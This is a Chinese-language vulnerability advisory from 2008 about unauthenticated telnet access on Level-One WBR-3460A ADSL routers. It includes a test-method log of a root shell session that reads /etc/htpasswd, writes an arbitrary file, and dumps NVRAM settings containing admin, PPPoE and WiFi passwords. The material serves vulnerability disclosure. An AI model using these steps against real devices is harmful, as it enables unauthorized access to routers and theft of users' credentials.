安全研究
安全漏洞
Level-One WBR-3460A无线路由器非授权访问漏洞
发布日期:2008-01-08
更新日期:2008-01-15
受影响系统:
Level-One WBR-3460A 1.00.12描述:
Level-One WBR-3460A 1.00.11
BUGTRAQ ID: 27183
Level-One WBR-3460A是一款4口的ADSL无线路由器。
Level-One WBR-3460A实现上存在访问认证漏洞,远程攻击者可能利用此漏洞非授权访问系统。
LevelOne WBR-3560A路由器没有限制对23/TCP端口上telnet服务的访问,用户可以未经认证便telnet访问设备,读取包含有敏感信息的系统文件,如/etc/htpasswd,或发布reboot命令导致设备拒绝服务。
<*来源:Anastasios Monachos (anastasiosm@gmail.com)
链接:http://secunia.com/advisories/28397/
http://marc.info/?l=bugtraq&m=119980644701163&w=2
*>
测试方法:
警 告
以下程序(方法)可能带有攻击性,仅供安全研究与教学之用。使用者风险自负!
Trying 192.168.0.1...
Connected to 192.168.0.1.
Escape character is '^]'.
BusyBox v0.61.pre (2007.03.16-05:39+0000) Built-in shell (ash)
Enter 'help' for a list of built-in commands.
# ls
bin dev etc lib proc sbin tmp usr var www
#
# ls /proc/
1 3 84 dma loadavg stat
107 3035 86 driver locks swaps
108 4 87 execdomains meminfo sys
110 43 89 filesystems misc sysvipc
111 4456 91 fs modules ticfg
112 5 92 interrupts mounts tty
1192 5233 avalanche iomem mtd uptime
124 5237 br_filter ioports net version
130 5239 br_trigger kcore partitions wlan
132 6 bus kmsg push_button
2 68 cmdline ksyms self
20 7 cpuinfo led slabinfo
246 80 devices led_mod special
#
# cat /etc/htpasswd
admin:MySecretPassword
#
# echo "any data" > /etc/filename
#
# cat /etc/filename
any data
#
# cat /tmp/nvram
IP806GAV3 time_zone=GMT+0 time_daylight= restore_default=0
(...removed for simplicity...)
dhcp_reserved= http_username=admin http_password=32spec904et28 http_timeout=5
(...removed for simplicity...)
pppoe_username=xxxxxxx.xxxxxx.xxxxx@myisp.mycctld pppoe_password=xxxxxxxx
(...removed for simplicity...)
wifi_access_list=00:1B:72:23:00:51Tasos-Laptop 00:01:71:97:86:0BTasos-WDongle
(...removed for simplicity...)
wifi_present=1 wiz_runtest= ipoa_mode= wifi_psk_pwd=Js5xxkwD3fvtxxxxx645KdLxxxxxx
#
建议:
厂商补丁:
Level-One
---------
目前厂商还没有提供补丁或者升级程序,我们建议使用此软件的用户随时关注厂商的主页以获取最新版本:
http://global.level1.com/products2.php?Id=821
浏览次数:3547
严重程度:0(网友投票)
绿盟科技给您安全的保障